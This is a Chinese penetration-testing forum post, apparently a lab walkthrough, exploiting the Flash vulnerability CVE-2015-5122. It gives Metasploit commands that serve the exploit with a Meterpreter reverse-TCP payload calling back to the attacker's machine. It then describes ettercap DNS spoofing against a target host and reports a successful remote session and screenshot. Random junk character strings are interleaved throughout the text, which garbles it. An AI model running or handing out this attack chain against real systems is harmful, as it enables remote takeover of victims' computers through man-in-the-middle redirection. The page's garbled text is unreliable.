中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

0 I) b. ], ^- l' _0 X+ D 二、cve2015-5122漏洞实例演示虚拟机 ' w! |$ j, ^+ f! w( g) I$ K$ x& d

/ z1 R5 @- \1 }' ]% O0 C9 z$ m 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： w/ W! z3 i- T* ?! e0 E! U

8 }7 {* q7 _ e a7 Y1 m search cve-2015-5122如图： 2 H* J8 O+ b' ]& u" J! D

1 Z8 X5 i7 s; [3 ^: S& L 3 T6 {9 [- F' Z( x0 C! c) H: ]

0 g) {. |4 V! U 下面我们敲如下命令： " t& x0 R" u- _. J# o! K

6 ~/ r, i& Z/ \( H" ^. J use exploit/multi/browser/adobe_flash_opaque_background_uaf S" B5 y* \$ L% T

7 T Y3 w7 ]/ W A; e& q' h0 R set PAYLOAD windows/meterpreter/reverse_tcp 5 Z# E/ V5 [# k( s

3 Z8 W3 ~: i+ u set LHOST 192.168.0.109 & ]/ ?: k9 q3 L

8 F2 E* X- P- ?3 K8 e8 O set URIPATH / /*根目录*/ & e8 J& m, G4 _, a; Y4 f# M8 ^0 G

6 G! z! I) F! p! t7 a set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ! B$ f1 v7 v: g5 U8 I

8 k% u; s, U) q& O set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! g2 ^8 ?0 H2 {/ w* h

+ j5 _9 q) E5 g 然后show options如图： & p X3 ]' i$ k! k- A1 J

& @- q0 K$ T' R6 z$ y ' ?: a" s3 |" G6 r( ^- k: q! b2 P/ A7 X

) F, T5 T9 Y4 c# x: ~ 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
) m8 y6 Y' k$ A / K$ g; [8 P" I8 s0 t3 ]

: R7 e2 u* O3 F9 _ 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 % u1 `1 _! _8 h- e7 n; ~* v

4 x/ y. |8 ?4 I Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf & {7 ]" j4 Z, s! e1 A4 w# \7 v- k

; P) x. l% u0 {! E: c ( t1 w9 N# {6 q" R

" L8 N! o1 p. w0 W 成功了，这时候我们断开ettercap，如图： 9 b# K H4 g4 v' R

. ?5 h5 e% ^3 q/ @) x }+ i; O 7 D* Y. W- n: T( e8 ?

: b) A) S& F# ?3 F9 \' k/ w Screenshot如图： 4 L; R2 z; }; H- g- [

* {6 `- w5 U" [. V/ p" e 7 E) u4 `; y' j1 S" ]0 l( o& U

6 t; O" E* b/ Z6 L) O ) S& n. j2 }$ A! n+ q. R( N* f

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)